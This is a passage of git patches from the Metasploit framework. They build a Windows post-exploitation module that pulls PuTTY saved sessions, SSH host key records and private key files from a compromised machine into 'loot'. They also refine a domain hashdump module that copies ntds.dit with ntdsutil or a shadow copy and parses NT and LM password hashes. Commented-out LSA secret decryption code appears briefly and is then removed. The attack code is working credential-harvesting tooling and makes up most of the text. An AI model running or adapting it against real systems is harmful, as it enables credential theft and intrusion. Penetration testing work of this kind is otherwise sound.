+    # Updates profile information about a specific browser client.
+    # It will also automatically initialize the profile (an empty one) if it's not found.
+    #
+    # @see #init_profile
+    # @param [String] tag A tag that's unique to the browser. Probably generated by Msf::Exploit::Remote::BrowserExploitServer#retrieve_tag.
+    # @param [String] key A specific key to update (for example: os name).
+    # @param [String] value The value for the key.
+    # @return [void]
     def update_profile(tag, key, value)
       profile = get_profile_info(tag)
       if profile.empty?
@@ -34,6 +48,11 @@ module Msf
       )
     end
 
+
+    # Initializes a profile.
+    #
+    # @param [String] tag A tag that's unique to the browser. Probably generated by Msf::Exploit::Remote::BrowserExploitServer#retrieve_tag.
+    # @return [void]
     def init_profile(tag)
       normalized_tag = "#{note_type_prefix}.#{tag}"
       empty_profile = { normalized_tag => {} }

From f65207ac4024baacffb62329a679b402d066a4a3 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Fri, 15 May 2015 16:20:46 +0100
Subject: [PATCH 0085/1013] Initial version, working

Needs tidying up.

Current version:
* Searches for PuTTY registry keys
* Downloades the Hostname, port, private key filename, username to log in as and any port forwarding instructions
* If the private keys are accessible on the box, download them to loot

To do:
* Detect whether pageant is running or not and report back
* Tidy up code (used another plugin as a template)
---
 .../gather/putty_enum_saved_sessions.rb       | 201 ++++++++++++++++++
 1 file changed, 201 insertions(+)
 create mode 100644 modules/post/windows/gather/putty_enum_saved_sessions.rb

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/putty_enum_saved_sessions.rb
new file mode 100644
index 0000000000..7614f49aa7
--- /dev/null
+++ b/modules/post/windows/gather/putty_enum_saved_sessions.rb
@@ -0,0 +1,201 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/registry'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+
+  INTERESTING_KEYS=['HostName','PublicKeyFile','UserName','PortNumber','PortForwardings']
+  def initialize(info={})
+    super(update_info(info,
+      'Name'            => "PuTTY thing",
+      'Description'     => %q{
+        This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:
+        HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt
+        code from cachedump.
+        },
+      'License'         => MSF_LICENSE,
+      'Platform'        => ['win'],
+      'SessionTypes'    => ['meterpreter'],
+      'Author'          => ['Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>']
+    ))
+  end
+
+
+#  # Decrypted LSA key is passed into this method
+#  def get_secret(lsa_key)
+#    output = "\n"
+#
+#    # LSA Secret key location within the registry
+#    root_regkey = "HKLM\\Security\\Policy\\Secrets\\"
+#    services_key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
+#
+#    secrets = registry_enumkeys(root_regkey)
+#
+#    secrets.each do |secret_regkey|
+#      sk_arr = registry_enumkeys(root_regkey + "\\" +  secret_regkey)
+#      next unless sk_arr
+#
+#      sk_arr.each do |mkeys|
+#        # CurrVal stores the currently set value of the key. In the case
+#        # of services, this is usually the password for the service
+#        # account.
+#        next unless mkeys == "CurrVal"
+#
+#        val_key = root_regkey + "\\" + secret_regkey + "\\" + mkeys
+#        encrypted_secret = registry_getvaldata(val_key, "")
+#
+#        next unless encrypted_secret
+#
+#        if lsa_vista_style?
+#          # Magic happens here
+#          decrypted = decrypt_lsa_data(encrypted_secret, lsa_key)
+#        else
+#          # and here
+#          encrypted_secret = encrypted_secret[0xC..-1]
+#          decrypted = decrypt_secret_data(encrypted_secret, lsa_key)
+#        end
+#
+#        next unless decrypted.length > 0
+#
+#        # axe all the non-printables
+#        decrypted = decrypted.scan(/[[:print:]]/).join
+#
+#        if secret_regkey.start_with?("_SC_")
+#          # Service secrets are named like "_SC_yourmom" for a service
+#          # with name "yourmom". Strip off the "_SC_" to get something
+#          # we can lookup in the list of services to find out what
+#          # account this secret is associated with.
+#          svc_name = secret_regkey[4,secret_regkey.length]
+#          svc_user = registry_getvaldata(services_key + svc_name, "ObjectName")
+#
+#          # if the unencrypted value is not blank and is a service, print
+#          print_good("Key: #{secret_regkey}\n Username: #{svc_user} \n Decrypted Value: #{decrypted}\n")
+#          output  << "Key: #{secret_regkey}\n Username: #{svc_user} \n Decrypted Value: #{decrypted}\n"
+#        else
+#          # if the unencrypted value is not blank, print
+#          print_good("Key: #{secret_regkey}\n Decrypted Value: #{decrypted}\n")
+#          output  << "Key: #{secret_regkey}\n Decrypted Value: #{decrypted}\n"
+#        end
+#      end
+#    end
+#
+#    return output
+#  end
+
+  def get_saved_session_details(sessions)
+
+    all_sessions = []
+    sessions.each do |ses|
+        newses = {}
+        newses['Name'] = Rex::Text.uri_decode(ses)
+        INTERESTING_KEYS.each do |key|
+            newses[key] = registry_getvaldata("HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\\#{ses}", key).to_s
+        end
+        all_sessions << newses
+    end 
+    all_sessions
+  end
+
+  def report(info)
+
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+      'Header'     => "PuTTY Saved Sessions",
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => ['Name'].append(INTERESTING_KEYS).flatten
+    )
+
+    info.each do |result|
+      row = []
+      row << result['Name']
+      INTERESTING_KEYS.each do |key|
+        row << result[key]
+      end  
+      results_table << row
+    end
+
+    print_line results_table.to_s
+    #stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_csv)
+    #print_status("Results saved to: #{stored_path}")
+  end
+
+  def grab_private_keys(sessions)
+    sessions.each do |ses|
+        filename = ses['PublicKeyFile'].to_s
+        next if filename.empty?
+
+        if file?(filename)
+           ppk = read_file(filename) 
+           stored_path = store_loot('putty.ppk.file', 'text/plain', session, ppk)
+           print_status("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
+        else
+           print_error("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) could not be found.")
+        end
+    end
+  end
+
+  # The sauce starts here
+  def run
+
+    # Look for saved sessions, break out if not.
+    saved_sessions = registry_enumkeys('HKCU\\Software\\SimonTatham\\PuTTY\\Sessions')
+    if saved_sessions.nil? || saved_sessions.empty?
+        print_error('No saved sessions found')
+        return
+    end
+
+    # Tell the user how many sessions have been found (with correct English)
+    print_status("Found #{saved_sessions.count} session#{saved_sessions.count>1?'s':''}") 
+
+    # Retrieve the saved session details & print them to the screen in a report
+    all_saved_sessions = get_saved_session_details(saved_sessions)
+    report(all_saved_sessions)
+
+    # If the private key file has been configured, retrieve it and save it to loot
+    print_status("Downloading private keys...")
+    grab_private_keys(all_saved_sessions)
+
+    binding.pry
+
+#    hostname = sysinfo['Computer']
+#    print_status("Executing module against #{hostname}")
+#
+#    print_status('Obtaining boot key...')
+#    bootkey = capture_boot_key
+#    vprint_status("Boot key: #{bootkey.unpack("H*")[0]}")
+#
+#    print_status('Obtaining Lsa key...')
+#    lsa_key = capture_lsa_key(bootkey)
+#    if lsa_key.nil?
+#      print_error("Could not retrieve LSA key. Are you SYSTEM?")
+#      return
+#    end
+#    vprint_status("Lsa Key: #{lsa_key.unpack("H*")[0]}")
+#
+#    secrets = hostname + get_secret(lsa_key)
+#
+#    print_status("Writing to loot...")
+#
+#    path = store_loot(
+#      'registry.lsa.sec',
+#      'text/plain',
+#      session,
+#      secrets,
+#      'reg_lsa_secrts.txt',
+#      'Registry LSA Secret Decrypted File'
+#      )
+#
+#      print_status("Data saved in: #{path}")
+  end
+end

From 14035a46b16d8cb1f6b2f8fc416521d3288a985b Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Fri, 15 May 2015 16:28:51 +0100
Subject: [PATCH 0086/1013] Fixed description

---
 .../gather/putty_enum_saved_sessions.rb       | 106 ++----------------
 1 file changed, 9 insertions(+), 97 deletions(-)

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/putty_enum_saved_sessions.rb
index 7614f49aa7..dc41dba3af 100644
--- a/modules/post/windows/gather/putty_enum_saved_sessions.rb
+++ b/modules/post/windows/gather/putty_enum_saved_sessions.rb
@@ -17,11 +17,14 @@ class Metasploit3 < Msf::Post
   INTERESTING_KEYS=['HostName','PublicKeyFile','UserName','PortNumber','PortForwardings']
   def initialize(info={})
     super(update_info(info,
-      'Name'            => "PuTTY thing",
+      'Name'            => "PuTTY Saved Sessions Enumeration Module",
       'Description'     => %q{
-        This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:
-        HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt
-        code from cachedump.
+        This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session
+        information from the registry. PuTTY is very configurable; some users may have configured
+        saved sessions which could include a username, private key file to use when authenticating,
+        host name etc.
+
+        If a private key is configured, an attempt will be made to download and store it in loot.
         },
       'License'         => MSF_LICENSE,
       'Platform'        => ['win'],
@@ -30,68 +33,6 @@ class Metasploit3 < Msf::Post
     ))
   end
 
-
-#  # Decrypted LSA key is passed into this method
-#  def get_secret(lsa_key)
-#    output = "\n"
-#
-#    # LSA Secret key location within the registry
-#    root_regkey = "HKLM\\Security\\Policy\\Secrets\\"
-#    services_key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
-#
-#    secrets = registry_enumkeys(root_regkey)
-#
-#    secrets.each do |secret_regkey|
-#      sk_arr = registry_enumkeys(root_regkey + "\\" +  secret_regkey)
-#      next unless sk_arr
-#
-#      sk_arr.each do |mkeys|
-#        # CurrVal stores the currently set value of the key. In the case
-#        # of services, this is usually the password for the service
-#        # account.
-#        next unless mkeys == "CurrVal"
-#
-#        val_key = root_regkey + "\\" + secret_regkey + "\\" + mkeys
-#        encrypted_secret = registry_getvaldata(val_key, "")
-#
-#        next unless encrypted_secret
-#
-#        if lsa_vista_style?
-#          # Magic happens here
-#          decrypted = decrypt_lsa_data(encrypted_secret, lsa_key)
-#        else
-#          # and here
-#          encrypted_secret = encrypted_secret[0xC..-1]
-#          decrypted = decrypt_secret_data(encrypted_secret, lsa_key)
-#        end
-#
-#        next unless decrypted.length > 0
-#
-#        # axe all the non-printables
-#        decrypted = decrypted.scan(/[[:print:]]/).join
-#
-#        if secret_regkey.start_with?("_SC_")
-#          # Service secrets are named like "_SC_yourmom" for a service
-#          # with name "yourmom". Strip off the "_SC_" to get something
-#          # we can lookup in the list of services to find out what
-#          # account this secret is associated with.
-#          svc_name = secret_regkey[4,secret_regkey.length]
-#          svc_user = registry_getvaldata(services_key + svc_name, "ObjectName")
-#
-#          # if the unencrypted value is not blank and is a service, print
-#          print_good("Key: #{secret_regkey}\n Username: #{svc_user} \n Decrypted Value: #{decrypted}\n")
-#          output  << "Key: #{secret_regkey}\n Username: #{svc_user} \n Decrypted Value: #{decrypted}\n"
-#        else
-#          # if the unencrypted value is not blank, print
-#          print_good("Key: #{secret_regkey}\n Decrypted Value: #{decrypted}\n")
-#          output  << "Key: #{secret_regkey}\n Decrypted Value: #{decrypted}\n"
-#        end
-#      end
-#    end
-#
-#    return output
-#  end
-
   def get_saved_session_details(sessions)
 
     all_sessions = []
@@ -106,7 +47,7 @@ class Metasploit3 < Msf::Post
     all_sessions
   end
 
-  def report(info)
+  def display_saved_sessions_report(info)
 
     # Results table holds raw string data
     results_table = Rex::Ui::Text::Table.new(
@@ -160,7 +101,7 @@ class Metasploit3 < Msf::Post
 
     # Retrieve the saved session details & print them to the screen in a report
     all_saved_sessions = get_saved_session_details(saved_sessions)
-    report(all_saved_sessions)
+    display_saved_sessions_report(all_saved_sessions)
 
     # If the private key file has been configured, retrieve it and save it to loot
     print_status("Downloading private keys...")
@@ -168,34 +109,5 @@ class Metasploit3 < Msf::Post
 
     binding.pry
 
-#    hostname = sysinfo['Computer']
-#    print_status("Executing module against #{hostname}")
-#
-#    print_status('Obtaining boot key...')
-#    bootkey = capture_boot_key
-#    vprint_status("Boot key: #{bootkey.unpack("H*")[0]}")
-#
-#    print_status('Obtaining Lsa key...')
-#    lsa_key = capture_lsa_key(bootkey)
-#    if lsa_key.nil?
-#      print_error("Could not retrieve LSA key. Are you SYSTEM?")
-#      return
-#    end
-#    vprint_status("Lsa Key: #{lsa_key.unpack("H*")[0]}")
-#
-#    secrets = hostname + get_secret(lsa_key)
-#
-#    print_status("Writing to loot...")
-#
-#    path = store_loot(
-#      'registry.lsa.sec',
-#      'text/plain',
-#      session,
-#      secrets,
-#      'reg_lsa_secrts.txt',
-#      'Registry LSA Secret Decrypted File'
-#      )
-#
-#      print_status("Data saved in: #{path}")
   end
 end

From ac04b8d1e7e202f389d112e9c2a8dd8af5ed1269 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Fri, 15 May 2015 10:47:31 -0500
Subject: [PATCH 0087/1013]  a little bit of cleanup

constantise some of the magic numbers in
the NTDS Account class

MSP-12358
---
 lib/metasploit/framework/ntds/account.rb      | 35 +++++++++++++------
 .../gather/credentials/domain_hashdump.rb     |  7 ++--
 2 files changed, 26 insertions(+), 16 deletions(-)

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index 9280a25b8c..bd485790c8 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -5,6 +5,19 @@ module Metasploit
       # priv extension.
       class Account
 
+        # Size of an NTDS Account Struct on the Wire
+        ACCOUNT_SIZE = 3948
+        # Size of a Date or Time Format String on the Wire
+        DATE_TIME_STRING_SIZE = 30
+        # Size of the AccountDescription Field
+        DESCRIPTION_SIZE =2048
+        # Size of a Hash History Record
+        HASH_HISTORY_SIZE = 792
+        # Size of a Hash String
+        HASH_SIZE = 33
+        # Size of the samAccountName field
+        NAME_SIZE = 40
+
         #@return [String] The AD Account Description
         attr_accessor :description
         #@return [Boolean] If the AD account is disabled
@@ -52,10 +65,10 @@ module Metasploit
         # @raise [ArgumentErrror] if a 3948 byte string is not supplied
         def initialize(raw_data)
           raise ArgumentError, "No Data Supplied" unless raw_data.present?
-          raise ArgumentError, "Invalid Data" unless raw_data.length == 3948
+          raise ArgumentError, "Invalid Data" unless raw_data.length == ACCOUNT_SIZE
           data = raw_data.dup
-          @name = get_string(data,40)
-          @description = get_string(data,2048)
+          @name = get_string(data,NAME_SIZE)
+          @description = get_string(data,DESCRIPTION_SIZE)
           @rid = get_int(data)
           @disabled = get_boolean(data)
           @locked = get_boolean(data)
@@ -65,13 +78,13 @@ module Metasploit
           @logon_count = get_int(data)
           @nt_history_count = get_int(data)
           @lm_history_count = get_int(data)
-          @expiry_date = get_string(data,30)
-          @logon_date =  get_string(data,30)
-          @logon_time = get_string(data,30)
-          @pass_date = get_string(data,30)
-          @pass_time = get_string(data,30)
-          @lm_hash = get_string(data,33)
-          @nt_hash = get_string(data,33)
+          @expiry_date = get_string(data,DATE_TIME_STRING_SIZE)
+          @logon_date =  get_string(data,DATE_TIME_STRING_SIZE)
+          @logon_time = get_string(data,DATE_TIME_STRING_SIZE)
+          @pass_date = get_string(data,DATE_TIME_STRING_SIZE)
+          @pass_time = get_string(data,DATE_TIME_STRING_SIZE)
+          @lm_hash = get_string(data,HASH_SIZE)
+          @nt_hash = get_string(data,HASH_SIZE)
           @lm_history = get_hash_history(data)
           @nt_history = get_hash_history(data)
           @sid = data
@@ -113,7 +126,7 @@ module Metasploit
         end
 
         def get_hash_history(data)
-          raw_history = data.slice!(0,792)
+          raw_history = data.slice!(0,HASH_HISTORY_SIZE)
           split_history = raw_history.scan(/.{1,33}/)
           split_history.map!{ |hash| hash.gsub(/\x00/,'')}
           split_history.reject!{ |hash| hash.blank? }
diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 512838f980..89e4375855 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -72,14 +72,11 @@ class Metasploit3 < Msf::Post
   end
 
   def is_domain_controller?
-    status = false
-    if session.fs.file.exists?('%SystemDrive%\Windows\ntds\ntds.dit')
-      status = true
-    end
-    status
+    session.fs.file.exists?('%SystemDrive%\Windows\ntds\ntds.dit')
   end
 
   def ntdsutil_method
+    get_env
     tmp_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
     result = cmd_exec("ntdsutil.exe", command_arguments)

From a3d91dff0b9d12d953a5c92b28d49df3cb6f95fd Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Fri, 15 May 2015 11:13:19 -0500
Subject: [PATCH 0088/1013] clean up ntds.dit file when done

delete the ntds.dit file we copied when
we are done

MSP-12358
---
 modules/post/windows/gather/credentials/domain_hashdump.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 89e4375855..3f3c7e9b1e 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -11,9 +11,9 @@ require 'metasploit/framework/ntds/parser'
 class Metasploit3 < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Auxiliary::Report
-  include Msf::Post::Windows::Services
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::ShadowCopy
+  include Msf::Post::File
 
   def initialize(info={})
     super(update_info(info,
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
             report_hash(hash_string.downcase,ad_account.name, realm)
           end
         end
+        rm_f(ntds_file)
       end
     end
   end
@@ -76,7 +77,6 @@ class Metasploit3 < Msf::Post
   end
 
   def ntdsutil_method
-    get_env
     tmp_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
     result = cmd_exec("ntdsutil.exe", command_arguments)
@@ -149,7 +149,7 @@ class Metasploit3 < Msf::Post
     sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
     target_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     print_status "Moving ntds.dit to #{target_path}"
-    client.fs.file.mv(sc_path, target_path)
+    move_file(sc_path, target_path)
     target_path
   end
 

From 631dfc0a0e0dd552b3d779b766b84cc424ec9323 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Fri, 15 May 2015 11:19:35 -0500
Subject: [PATCH 0089/1013] increase timeout on ntdsutil

default timeout is 15 seconds. we'll give it 90
seconds for now. This may still be too short for
really really large domains, but too long of a timeout
can create other issues

MSP-12358
---
 modules/post/windows/gather/credentials/domain_hashdump.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 3f3c7e9b1e..5176be4d4d 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Post
   def ntdsutil_method
     tmp_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
-    result = cmd_exec("ntdsutil.exe", command_arguments)
+    result = cmd_exec("ntdsutil.exe", command_arguments,90)
     if result.include? "IFM media created successfully"
       file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
       print_status "NTDS database copied to #{file_path}"

From 4a88790c8c133eb4777e5554bd671a24714ff127 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Fri, 15 May 2015 17:57:15 +0100
Subject: [PATCH 0090/1013] Added SSH host keys

---
 .../gather/putty_enum_saved_sessions.rb       | 102 +++++++++++++++---
 1 file changed, 87 insertions(+), 15 deletions(-)

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/putty_enum_saved_sessions.rb
index dc41dba3af..a02cacd0ad 100644
--- a/modules/post/windows/gather/putty_enum_saved_sessions.rb
+++ b/modules/post/windows/gather/putty_enum_saved_sessions.rb
@@ -67,8 +67,58 @@ class Metasploit3 < Msf::Post
     end
 
     print_line results_table.to_s
-    #stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_csv)
-    #print_status("Results saved to: #{stored_path}")
+  end
+
+  def get_stored_host_key_details(allkeys)
+
+    # This hash will store (as the key) host:port pairs. This is basically a quick way of
+    # getting a unique list of host:port pairs.
+    all_ssh_host_keys = {}
+
+    # This regex will split up lines such as rsa2@22:127.0.0.1 from the registry.
+    rx_split_hostporttype = %r{^(?<type>[-a-z0-9]+?)@(?<port>[0-9]+?):(?<host>.+)$}i
+
+    # Go through each of the stored keys found in the registry
+    allkeys.each do |key|
+
+        # Store the raw key and value in a hash to start off with
+        newkey = {
+          rawname: key,
+          rawsig: registry_getvaldata("HKCU\\Software\\SimonTatham\\PuTTY\\SshHostKeys", key).to_s
+        }
+
+        # Take the key and split up host, port and fingerprint type. If it matches, store the information
+        # in the hash for later.
+        split_hostporttype = rx_split_hostporttype.match(key.to_s)
+        unless split_hostporttype
+            newkey['host'] = split_hostporttype[:host]
+            newkey['port'] = split_hostporttype[:port]
+            newkey['type'] = split_hostporttype[:type]
+            host_port = "#{newkey['host']}:#{newkey['port']}"
+            all_ssh_host_keys[host_port] = true
+        end
+    end 
+    puts all_ssh_host_keys.inspect
+    all_ssh_host_keys
+  end
+
+  def display_stored_host_keys_report(info)
+
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+      'Header'     => "Stored SSH host key fingerprints",
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => ['SSH Endpoint']
+    )
+
+    info.each do |key,result|
+      row = []
+      row << key
+      results_table << row
+    end
+
+    print_line results_table.to_s
   end
 
   def grab_private_keys(sessions)
@@ -86,28 +136,50 @@ class Metasploit3 < Msf::Post
     end
   end
 
-  # The sauce starts here
+  
+  # Entry point
   def run
 
     # Look for saved sessions, break out if not.
-    saved_sessions = registry_enumkeys('HKCU\\Software\\SimonTatham\\PuTTY\\Sessions')
+    print_status("Looking for saved PuTTY sessions")
+    #saved_sessions = registry_enumkeys('HKCU\\Software\\SimonTatham\\PuTTY\\Sessions')
+    saved_sessions = nil
     if saved_sessions.nil? || saved_sessions.empty?
         print_error('No saved sessions found')
-        return
+    else
+
+	    # Tell the user how many sessions have been found (with correct English)
+	    print_status("Found #{saved_sessions.count} session#{saved_sessions.count>1?'s':''}") 
+	
+	    # Retrieve the saved session details & print them to the screen in a report
+	    all_saved_sessions = get_saved_session_details(saved_sessions)
+	    display_saved_sessions_report(all_saved_sessions)
+	
+	    # If the private key file has been configured, retrieve it and save it to loot
+	    print_status("Downloading private keys...")
+	    grab_private_keys(all_saved_sessions)
+
     end
 
-    # Tell the user how many sessions have been found (with correct English)
-    print_status("Found #{saved_sessions.count} session#{saved_sessions.count>1?'s':''}") 
+    #binding.pry
 
-    # Retrieve the saved session details & print them to the screen in a report
-    all_saved_sessions = get_saved_session_details(saved_sessions)
-    display_saved_sessions_report(all_saved_sessions)
+    # Now search for SSH stored keys. These could be useful because it shows hosts that the user
+    # has previously connected to and accepted a key from. 
+    print_status("Looking for previously stored SSH host key fingerprints")
+    stored_ssh_host_keys = registry_enumvals('HKCU\\Software\\SimonTatham\\PuTTY\\SshHostKeys')
+    if stored_ssh_host_keys.nil? || stored_ssh_host_keys.empty?
+        print_error('No stored SSH host keys found')
+    else
+	    # Tell the user how many sessions have been found (with correct English)
+	    print_status("Found #{stored_ssh_host_keys.count} stored key fingerprint#{stored_ssh_host_keys.count>1?'s':''}") 
 
-    # If the private key file has been configured, retrieve it and save it to loot
-    print_status("Downloading private keys...")
-    grab_private_keys(all_saved_sessions)
-
-    binding.pry
+	    # Retrieve the saved session details & print them to the screen in a report
+	    print_status("Downloading stored key fingerprints...")
+	    all_stored_keys = get_stored_host_key_details(stored_ssh_host_keys)
+	    print_status("Unique host:port pairs are shown in the table below. All other details, including the actual fingerprint, are stored in notes (putty.ssh.fingerprint)")
+        display_stored_host_keys_report(all_stored_keys) 
 
+    end
   end
+
 end

From fd1a24d6f9180172a8fd7477e07209bda4b1d64f Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Fri, 15 May 2015 13:33:48 -0500
Subject: [PATCH 0091/1013] some more minor cleanup noise

apparently we standardized on using get_env
instead of expand_path in these cases. Not sure
on the effective difference here but no big deal

MSP-12358
---
 .../post/windows/gather/credentials/domain_hashdump.rb    | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 5176be4d4d..615533b095 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -73,11 +73,11 @@ class Metasploit3 < Msf::Post
   end
 
   def is_domain_controller?
-    session.fs.file.exists?('%SystemDrive%\Windows\ntds\ntds.dit')
+    file_exist?('%SystemDrive%\Windows\ntds\ntds.dit')
   end
 
   def ntdsutil_method
-    tmp_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    tmp_path = "#{get_env("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
     result = cmd_exec("ntdsutil.exe", command_arguments,90)
     if result.include? "IFM media created successfully"
@@ -143,11 +143,11 @@ class Metasploit3 < Msf::Post
   end
 
   def vss_method
-    id = create_shadowcopy("#{expand_path("%SystemDrive%")}\\")
+    id = create_shadowcopy("#{get_env("%SystemDrive%")}\\")
     print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
     sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
-    target_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    target_path = "#{get_env("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     print_status "Moving ntds.dit to #{target_path}"
     move_file(sc_path, target_path)
     target_path

From 5d273d53b484a9d58f82ecf1980ba2a9e37b58d2 Mon Sep 17 00:00:00 2001
From: Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
Date: Fri, 15 May 2015 22:02:12 +0100
Subject: [PATCH 0092/1013] Fixed module logic so that the key fingerprints now
 get displayed properly:

---
 .../gather/putty_enum_saved_sessions.rb       | 29 ++++++++++++-------
 1 file changed, 19 insertions(+), 10 deletions(-)

diff --git a/modules/post/windows/gather/putty_enum_saved_sessions.rb b/modules/post/windows/gather/putty_enum_saved_sessions.rb
index a02cacd0ad..77e1d93d2a 100644
--- a/modules/post/windows/gather/putty_enum_saved_sessions.rb
+++ b/modules/post/windows/gather/putty_enum_saved_sessions.rb
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post
         host name etc.
 
         If a private key is configured, an attempt will be made to download and store it in loot.
-        },
+       },
       'License'         => MSF_LICENSE,
       'Platform'        => ['win'],
       'SessionTypes'    => ['meterpreter'],
@@ -90,15 +90,21 @@ class Metasploit3 < Msf::Post
         # Take the key and split up host, port and fingerprint type. If it matches, store the information
         # in the hash for later.
         split_hostporttype = rx_split_hostporttype.match(key.to_s)
-        unless split_hostporttype
+        if split_hostporttype
+
+            # Extract the host, port and key type into the hash
             newkey['host'] = split_hostporttype[:host]
             newkey['port'] = split_hostporttype[:port]
             newkey['type'] = split_hostporttype[:type]
+
+            # Form the key 
             host_port = "#{newkey['host']}:#{newkey['port']}"
-            all_ssh_host_keys[host_port] = true
+
+            # Add it to the consolidation hash. If the same IP has different key types, append to the array
+            all_ssh_host_keys[host_port] = [] if all_ssh_host_keys[host_port].nil?
+            all_ssh_host_keys[host_port] << newkey['type']
         end
     end 
-    puts all_ssh_host_keys.inspect
     all_ssh_host_keys
   end
 
@@ -109,12 +115,13 @@ class Metasploit3 < Msf::Post
       'Header'     => "Stored SSH host key fingerprints",
       'Indent'     => 1,
       'SortIndex'  => -1,
-      'Columns'    => ['SSH Endpoint']
+      'Columns'    => ['SSH Endpoint', 'Key Type(s)']
     )
 
     info.each do |key,result|
       row = []
       row << key
+      row << result.join(', ')
       results_table << row
     end
 
@@ -161,8 +168,6 @@ class Metasploit3 < Msf::Post
 
     end
 
-    #binding.pry
-
     # Now search for SSH stored keys. These could be useful because it shows hosts that the user
     # has previously connected to and accepted a key from. 
     print_status("Looking for previously stored SSH host key fingerprints")
@@ -176,10 +181,14 @@ class Metasploit3 < Msf::Post
 	    # Retrieve the saved session details & print them to the screen in a report
 	    print_status("Downloading stored key fingerprints...")
 	    all_stored_keys = get_stored_host_key_details(stored_ssh_host_keys)
-	    print_status("Unique host:port pairs are shown in the table below. All other details, including the actual fingerprint, are stored in notes (putty.ssh.fingerprint)")
-        display_stored_host_keys_report(all_stored_keys) 
-
+        if all_stored_keys.nil? || all_stored_keys.empty?
